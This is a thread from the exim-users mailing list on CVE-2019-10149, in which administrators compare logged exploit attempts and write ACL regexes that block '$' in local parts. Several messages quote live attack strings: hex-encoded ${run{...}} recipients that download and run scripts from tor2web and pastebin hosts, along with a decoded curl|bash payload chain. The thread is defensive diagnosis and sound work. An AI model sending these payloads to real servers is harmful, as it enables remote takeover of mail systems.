Re: [exim] CVE-2019-10149: already vulnerable ?
On 04/07/2019 21:23, Ian Zimmerman via Exim-users wrote: > After your important discovery that escaping is done on local parts as > part of SMTP (at least that's how I interpreted the disappearance of the > backslash from "it\z"), the next question should be but has not yet > been: why is this needed at all? Because Exim's string-escaping lets you write a dollar-sign as \x24. So we need to get a matcher for that into the RE. > Won't the whole escape sequence be > transformed into a dollar sign by the time it is matched against the > rule? No; the SMTP string-escaping does not provide that facility. So an attacker can fairly simply get somthing into a local-part which ends up as a \x24 after the SMTP de-escaping. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Am 05.07.19 um 06:26 schrieb Jasen Betts via Exim-users: > > It looks to me like it matches any string, it should probably be ^.*\$ > which would match any astring contailnin literal '$' It's a crude, brutal protection rule against a root exploit, of course it shall block *any* $ in that string :) >> ^.\\x24 does the same? > matches containing literal '\x24' > >> but I'm stymied about the \\0.44 notation, what's that? > assuming typo: \\0?44 matches strings containing literal '\044' and '\44' > octal version of \x24 aka $ . Guys, the rules are made to even protect against "new" "inventive" forms for encoding attacks for a handfull of servers not capable of updating, taking into account, that some none harmfull strings are also matched. They are not meant for upgraded production servers, as they are not needed there. The MOTD is "better be safe, than sorry" . If you wanne make the rules better, easier, smarter, please do so, but you are wasting time and resources you should use to upgrade your installations. best regrads, Marius -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 2019-07-03, Marc Haber via Exim-users wrote: > On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users > wrote: >> deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N >>message = no mate > > This might be a really stupid question, but what exactly does that do? > > ^.*$ blocks local_parts containing a $ It looks to me like it matches any string, it should probably be ^.*\$ which would match any astring contailnin literal '$' > ^.\\x24 does the same? matches containing literal '\x24' > but I'm stymied about the \\0.44 notation, what's that? assuming typo: \\0?44 matches strings containing literal '\044' and '\44' -- When I tried casting out nines I made a hash of it. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 2019-07-03 21:42, Jeremy Harris wrote: > > \\x24 should match the literal \x24, which may be used to encode the > > dollar sign for the unintended local_part expansion in the vulnerable > > code. After your important discovery that escaping is done on local parts as part of SMTP (at least that's how I interpreted the disappearance of the backslash from "it\z"), the next question should be but has not yet been: why is this needed at all? Won't the whole escape sequence be transformed into a dollar sign by the time it is matched against the rule? -- Please don't Cc: me privately on mailing lists and Usenet, if you also post the followup to the list or newsgroup. To reply privately _only_ on Usenet and on broken lists which rewrite From, fetch the TXT record for no-use.mooo.com. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 03/07/2019 20:02, Heiko Schlittermann via Exim-users wrote: > Marc Haber via Exim-users (Mi 03 Jul 2019 18:17:24 > CEST): >> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users >> wrote: >>> deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N >>>message = no mate >> >> This might be a really stupid question, but what exactly does that do? >> >> ^.*$ blocks local_parts containing a $ >> ^.\\x24 does the same? >> but I'm stymied about the \\0.44 notation, what's that? > > From my POV ^.*$ matches *any* local_part, as $ is the string's end anchor, > isn't it?. > But I can't imagine that such mistake happens to Jeremy, so I assume, I'm > missing the point here. You're not missing the point at all; I made a foolish error. That should have been ^.*\$ - to get any local_part containing a dollar. > \\x24 should match the literal \x24, which may be used to encode the > dollar sign for the unintended local_part expansion in the vulnerable > code. > > \\044 and \\44 may encode the dollar sign in base8 notation, with and > w/o the leading zero. Both are collapsed into \\0?44 Yes. But (MH) note there is a question-mark there, not a period. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Marc Haber via Exim-users (Mi 03 Jul 2019 18:17:24 CEST): > On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users > wrote: > > deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N > >message = no mate > > This might be a really stupid question, but what exactly does that do? > > ^.*$ blocks local_parts containing a $ > ^.\\x24 does the same? > but I'm stymied about the \\0.44 notation, what's that? From my POV ^.*$ matches *any* local_part, as $ is the string's end anchor, isn't it?. But I can't imagine that such mistake happens to Jeremy, so I assume, I'm missing the point here. \\x24 should match the literal \x24, which may be used to encode the dollar sign for the unintended local_part expansion in the vulnerable code. \\044 and \\44 may encode the dollar sign in base8 notation, with and w/o the leading zero. Both are collapsed into \\0?44 But I may be totally wrong here. -- Heiko signature.asc Description: PGP signature -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users wrote: > deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N >message = no mate This might be a really stupid question, but what exactly does that do? ^.*$ blocks local_parts containing a $ ^.\\x24 does the same? but I'm stymied about the \\0.44 notation, what's that? Greetings Marc -- -- !! No courtesy copies, please !! - Marc Haber | " Questions are the | Mailadresse im Header Mannheim, Germany | Beginning of Wisdom " | Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834 -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 25/06/2019 19:01, mixed8e--- via Exim-users wrote: >> and i was not sure if EXIM does publish that string in any other possible >> remote "access vector" too. > > That would be nice to know. A scan over the source gives me: - logged at daemon startup & shutdown - written to the process log on SIGUSR1 - included in debug, "-bP config" & "-bV" output - the default Received: header text - the default banner text Only the last two are remotely accessible; all are locally acessible -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
inline…
On 24/06/2019 7:18 pm, mixed8e--- via Exim-users wrote:
On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users
wrote:
Check your system for unusual activities.
Symptoms on a hacked system I got aware of were quite similar. The
log
reported about too many received headers:
root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
2019-06-20 15:13:33 Received from <> H=(.de)
[89.248.171.57] P=smtp S=1114
2019-06-20 15:13:33 routing failed for
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de: Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
Checked my mail server today as well and found 46 frozen mails and
plenty of the same log messages. All of the mails were sent from a
single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
are sent every 3 hours.
As far as I can tell nothing was changed on the server though. Files
are fine, cron entries are standard and no cryptominer is running (CPU
utilization is low).
I got to see this on a server where the attack was successful. The code
executed by the wget in the ${run...} command downloaded this script:
https://pastebin.com/c3LKPEDU
It tries to maintain infection by inserting several cron changes and copy
itself in several places around the file system.
On another machine it looks like I saw a different attack, but I don't
know enough about Exim. There are a large number of files in /root (Exim
is being run as root on this server) that have names like:
86NoHEg
DBaH23d
f8fam2O
Cg8E4NM
Those files are all binary, but the dates on them confuse me: there are a
group from June 15, June 16, then there is a group from May 20 which is
before the exploit was announced.
It doesn't look related to the attack I saw.
but check the inode change time (ctime), with e.g "ls -lc". In the
attack I saw, there were various faked mtimes, including old ones, but
the ctimes were the day of the attack.
cheers,
calum.
Perhaps this is unrelated? There are no
cron job entries that try to execute these files. I'm not sure what to
make of them.
Help?
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Niels Dettenbach via Exim-users (Di 25 Jun 2019 14:48:20
CEST):
> Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim-
> users:
> > No recompile needed. smtp_banner.
> This only set's the banner, but not the SMTP-Headers " by " which are
> "public" too and used as a idicator for "security researchers" (by my
> experience) - i.e. germany BSI.
Starting with the next version (4.93) we have "exim_version" main
option.
++
|exim_version|Use: main|Type: string|Default: current version|
++
This option allows to override the $version_number/$exim_version Exim
reports
in various places. Use with care, this may fool stupid security scanners.
Best regards from Dresden/Germany
Viele Grüße aus Dresden
Heiko Schlittermann
--
SCHLITTERMANN.de internet & unix support -
Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
gnupg encrypted messages are welcome --- key ID: F69376CE -
! key id 7CBF764A and 972EAC9F are revoked since 2015-01 -
signature.asc
Description: PGP signature
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Am Dienstag, 25. Juni 2019, 15:03:02 CEST schrieb Jeremy Harris via Exim- users: > Indeed; but only the banner was being asked about. ok, sorry for the noise. for me, the the Recvd header is a kind of "banner" too. seems a misunderstanding from my side. > You're interested in received_header_text, I suspect. possible too - but easy to "break" any less known rfcs or "expected practices" without a proven "default" and so deeper experience about that - and i was not sure if EXIM does publish that string in any other possible remote "access vector" too. -- --- Niels Dettenbach Syndicat IT & Internet http://www.syndicat.com PGP: https://syndicat.com/pub_key.asc --- signature.asc Description: This is a digitally signed message part. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 25/06/2019 13:48, Niels Dettenbach via Exim-users wrote: > Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim- > users: >> No recompile needed. smtp_banner. > This only set's the banner, but not the SMTP-Headers " by " which are > "public" too and used as a idicator for "security researchers" (by my > experience) - i.e. germany BSI. Indeed; but only the banner was being asked about. You're interested in received_header_text, I suspect. PS: I do not need an additional copy of list emails. I get very tired of getting them. If your MUA does not have a "reply to list" button, please get a better one. I swear, I'm going to start deliberately ignoring anyone who sends me a useless copy, real soon now. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim- users: > No recompile needed. smtp_banner. This only set's the banner, but not the SMTP-Headers " by " which are "public" too and used as a idicator for "security researchers" (by my experience) - i.e. germany BSI. hth, niels. -- --- Niels Dettenbach Syndicat IT & Internet http://www.syndicat.com PGP: https://syndicat.com/pub_key.asc --- signature.asc Description: This is a digitally signed message part. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
mixed8e--- via Exim-users wrote on 24/06/2019 20:02: > Dumb question, what is the config setting that allows me to remove the > Exim version from the greet banner? https://www.exim.org/exim-html-current/doc/html/spec_html/ch-main_configuration.html search for smtp_banner Greetings, Wolfgang -- Wolfgang Breyha | https://www.blafasel.at/ Vienna University Computer Center | Austria -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 25/06/2019 12:41, Niels Dettenbach via Exim-users wrote: > Am Montag, 24. Juni 2019, 20:02:33 CEST schrieb mixed8e--- via Exim-users: >> Dumb question, what is the config setting that allows me to remove the >> Exim version from the greet banner? > If i remember right, there is no such option in the config file No recompile needed. smtp_banner. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 24/06/2019 19:18, mixed8e--- via Exim-users wrote: > a group from May 20 which is > before the exploit was announced. Perhaps this is unrelated? There are no > cron job entries that try to execute these files. I'm not sure what to > make of them. Perhaps your system was already compromised by other means. I'd suggest a reinstall. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 24/06/2019 18:55, Ian Zimmerman via Exim-users wrote: > I think this is a bug, do you agree? Yes. Looking into that. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 24/06/2019 18:55, Ian Zimmerman via Exim-users wrote: > RCPT TO: > > the local part being tested, according to the >>> output, is just "itz", > which of course ends up being accepted. > > I think this is a bug, do you agree? This turns out to be deliberate, with the following code comment: /* The implication in the RFCs (though I can't say I've seen it spelled out explicitly) is that quoting should be removed from local parts at the point where they are locally interpreted. [The new draft "821" is more explicit on this, Jan 1999.] We know the syntax is valid, so this can be done by simply removing quoting backslashes and any unquoted doublequotes. */ ( function "deliver_split_address" ) So, to get a backslash into a local-part you have to double it in the SMTP RCPT line: RCPT TO: -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Am 24.06.19 um 19:55 schrieb Ian Zimmerman via Exim-users: > On 2019-06-24 17:23, Jeremy Harris wrote: > For instance, if I say this in the -bh dialog: > > RCPT TO: > > the local part being tested, according to the >>> output, is just "itz", > which of course ends up being accepted. > > I think this is a bug, do you agree? > try a real Escape Sequence like \x instead, as \z is no valid escape sequence. Exim may remove those as "bugs in your regex" before processsing it. best regards, Marius -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 2019-06-24 17:23, Jeremy Harris wrote: > > I just want to prohibit any backslashes in local parts. I know this is > > totally safe to do im my case. So what it the appropriate number of > > backslashes to put in the regexp? Will this work: > > > > deny message = Restricted characters in address > > domains = +local_domains > > local_parts = ^[.] : ^.*[\$@%!/\\|] > > I suggest quoting the entire list with \N for sanity. > Having done that I think you need a double backslash. I did when I > tested it. I suggest you test it yourself, using -bh. So I tried that. Unfortunately, it seems that some part of Exim eats the backslashes before they are seen by the ACL. I don't know if this happens only in -bh mode or if it would happen with a running daemon too. I'm not trying the latter ATM. For instance, if I say this in the -bh dialog: RCPT TO: the local part being tested, according to the >>> output, is just "itz", which of course ends up being accepted. I think this is a bug, do you agree? -- Please don't Cc: me privately on mailing lists and Usenet, if you also post the followup to the list or newsgroup. To reply privately _only_ on Usenet and on broken lists which rewrite From, fetch the TXT record for no-use.mooo.com. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Best I have so far is adding '$' to the the trailing case in the Debian default list of bad chars in local parts of local addresses: CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$ which gets used here: deny domains = +local_domains local_parts = CHECK_RCPT_LOCAL_LOCALPARTS message = restricted characters in address I had to use '\\\$', rather than adding '$' to the existing [] block, due to both string expansion and '$' having a special meaning to PCRE. that seems to work, at least. This won't affect sender addresses with the exploit attempt, but those will just get delivered (assuming the recipient is good, with no frozen queue msgs. And it won't help for relaying attempts (where a '$' might in theory be valid), but my server should stop those before they get to the queue. Of course, this also required the patched exim to ensure the exploit doesn't actually work (with the sender address). comments? cheers, calum. On 23/06/2019 6:51 pm, Calum Mackay via Exim-users wrote: On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote: CVE-2019-10149 is not that it is possible to submit a mail that ends up frozen in the queue. CVE is a remote command execution vulnerabilty. The fix for CVE-2019-10149 does not remove the possibility to generate frozen mails in the queue, it stops the remote command execution. by any chance, please, would anyone happen to have an acl_smtp_rcpt example that catches these particular exploit attempts — so my queue doesn't fill up with these frozen msgs — /but/ still allows me to have "user+suffix@domain" which I enable via local_part_suffix on a redirect router? i.e. just rejecting '+' in the local part is too strict, here. thanks very much indeed. cheers, calum. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On Sun, Jun 23, 2019 at 07:37:37PM +0200, Heiko Schlittermann via Exim-users wrote: > It *seems* that the attackers test for the Exim version in the SMTP > banner. In servers having 4.92 I do not see as many attempts as on > 4.87->4.91. But there may be other things influencing this. I have 4 external relays for my company with custom greeting message which has no word "Exim" and no version. No breaking attempts logged up to 16.06.2019, since this date logs have records about probes with prefix "root+": . -- Eugene Berdnikov -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
or, indeed just \$ within the []: CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[\$@%!/|`#&?] and I've belatedly noticed that this has already been posted by Marius, sorry! Apologies for the noise. cheers, calum. On 23/06/2019 7:57 pm, Calum Mackay wrote: Best I have so far is adding '$' to the the trailing case in the Debian default list of bad chars in local parts of local addresses: CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$ which gets used here: deny domains = +local_domains local_parts = CHECK_RCPT_LOCAL_LOCALPARTS message = restricted characters in address I had to use '\\\$', rather than adding '$' to the existing [] block, due to both string expansion and '$' having a special meaning to PCRE. that seems to work, at least. This won't affect sender addresses with the exploit attempt, but those will just get delivered (assuming the recipient is good, with no frozen queue msgs. And it won't help for relaying attempts (where a '$' might in theory be valid), but my server should stop those before they get to the queue. Of course, this also required the patched exim to ensure the exploit doesn't actually work (with the sender address). comments? cheers, calum. On 23/06/2019 6:51 pm, Calum Mackay via Exim-users wrote: On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote: CVE-2019-10149 is not that it is possible to submit a mail that ends up frozen in the queue. CVE is a remote command execution vulnerabilty. The fix for CVE-2019-10149 does not remove the possibility to generate frozen mails in the queue, it stops the remote command execution. by any chance, please, would anyone happen to have an acl_smtp_rcpt example that catches these particular exploit attempts — so my queue doesn't fill up with these frozen msgs — /but/ still allows me to have "user+suffix@domain" which I enable via local_part_suffix on a redirect router? i.e. just rejecting '+' in the local part is too strict, here. thanks very much indeed. cheers, calum. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 23/06/2019 18:51, Calum Mackay via Exim-users wrote: > by any chance, please, would anyone happen to have an acl_smtp_rcpt > example that catches these particular exploit attempts — so my queue > doesn't fill up with these frozen msgs — /but/ still allows me to have > "user+suffix@domain" which I enable via local_part_suffix on a redirect > router? deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N message = no mate Thie is perhaps over-broad - a dollar sign in a local-part is strictly legitimate per the standards. However, it's not something most strictly-Ascii sites would be wanting to use, I suspect. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote: CVE-2019-10149 is not that it is possible to submit a mail that ends up frozen in the queue. CVE is a remote command execution vulnerabilty. The fix for CVE-2019-10149 does not remove the possibility to generate frozen mails in the queue, it stops the remote command execution. by any chance, please, would anyone happen to have an acl_smtp_rcpt example that catches these particular exploit attempts — so my queue doesn't fill up with these frozen msgs — /but/ still allows me to have "user+suffix@domain" which I enable via local_part_suffix on a redirect router? i.e. just rejecting '+' in the local part is too strict, here. thanks very much indeed. cheers, calum. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Hello,
Thomas Hager via Exim-users (Fr 21 Jun 2019 21:26:11
CEST):
> > 2019-06-20 15:13:33 Received from <> H=(.de)
> > [89.248.171.57] P=smtp S=1114
> > 2019-06-20 15:13:33 routing failed for
> > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> > k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
> > x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
> > 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@ > sored>.de: Too many "Received" headers - suspected mail loop
As Andreas M pointed out, the logs are the same, independently of an
successfull attack. (Though a wise attacker would remove the log lines.)
It *seems* that the attackers test for the Exim version in the SMTP
banner. In servers having 4.92 I do not see as many attempts as on
4.87->4.91. But there may be other things influencing this.
Best regards from Dresden/Germany
Viele Grüße aus Dresden
Heiko Schlittermann
--
SCHLITTERMANN.de internet & unix support -
Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
gnupg encrypted messages are welcome --- key ID: F69376CE -
! key id 7CBF764A and 972EAC9F are revoked since 2015-01 -
signature.asc
Description: PGP signature
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On June 22, 2019 10:44:43 AM GMT+02:00, Andreas Metzler via Exim-users wrote: >Hello Hi Andreas, >the log-files on a try to exploit CVE-2019-10149 will look exactly the >same >for a vulnerable and for a fixed exim. > >CVE-2019-10149 is not that it is possible to submit a mail that ends >up frozen in the queue. CVE is a remote command execution >vulnerabilty. The fix for CVE-2019-10149 does not remove the >possibility to generate frozen mails in the queue, it stops the remote >command execution. Thanks for the clarification. I thought so, but it's way better to know ;-) Cheers, Tom. -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Am 21.06.19 um 16:29 schrieb Benoît PELISSIER via Exim-users:
>> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
>> 2019-06-20 15:13:33 Received from <> H=(.de)
>> [89.248.171.57] P=smtp S=1114
>> 2019-06-20 15:13:33 routing failed for
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de:
>> Too many "Received" headers - suspected mail loop
>> *** Frozen (delivery error message)
>
> I have this log entry too...
>
Does not look good for you to be honest.
Best regards,
Marius
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
The version is fine.
But the question is, when did you install this version?
When debian update his repo
Check your system for unusual activities.
Symptoms on a hacked system I got aware of were quite similar. The log
reported about too many received headers:
root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
2019-06-20 15:13:33 Received from <> H=(.de) [89.248.171.57] P=smtp
S=1114
2019-06-20 15:13:33 routing failed for
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de:
Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
I have this log entry too...
Benoît
<>--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
Benoît PELISSIER via Exim-users wrote:
> ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost
$ perl -e 'print
"\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22\n";'
/bin/sh -c "curl https://pastebin.com/raw/Dj3JTtnj -o /tmp/baby"
then:
$ wget --quiet -O - https://pastebin.com/raw/Dj3JTtnj && echo
nohup bash -c '(curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q
-O- hhttps://pastebin.com/raw/EzqVke6X)|bash' >/dev/null 2>&1 &
rm -rf /tmp/baby*
$ wget --quiet -O - https://pastebin.com/raw/EzqVke6X && echo
(curl -fsSL https://pastebin.com/raw/yVAeeKTB||wget -q -O -
https://pastebin.com/raw/yVAeeKTB)| base64 -d |bash
Which yeilds the content I've pasted at:
https://pastebin.com/Gzi4cvc8
Regards
D.
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
My version is updated so they cant, but they tried ? Benoît Le 21/06/2019 à 15:20, Jeremy Harris via Exim-users a écrit : On 21/06/2019 08:00, Benoît PELISSIER via Exim-users wrote: My mail system ha been hacked ? At the very least an appempt to do so CVE-2019-10149 ? Yes <>-- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] CVE-2019-10149: already vulnerable ?
On 21/06/2019 08:00, Benoît PELISSIER via Exim-users wrote: > My mail system ha been hacked ? At the very least an appempt to do so > CVE-2019-10149 ? Yes -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
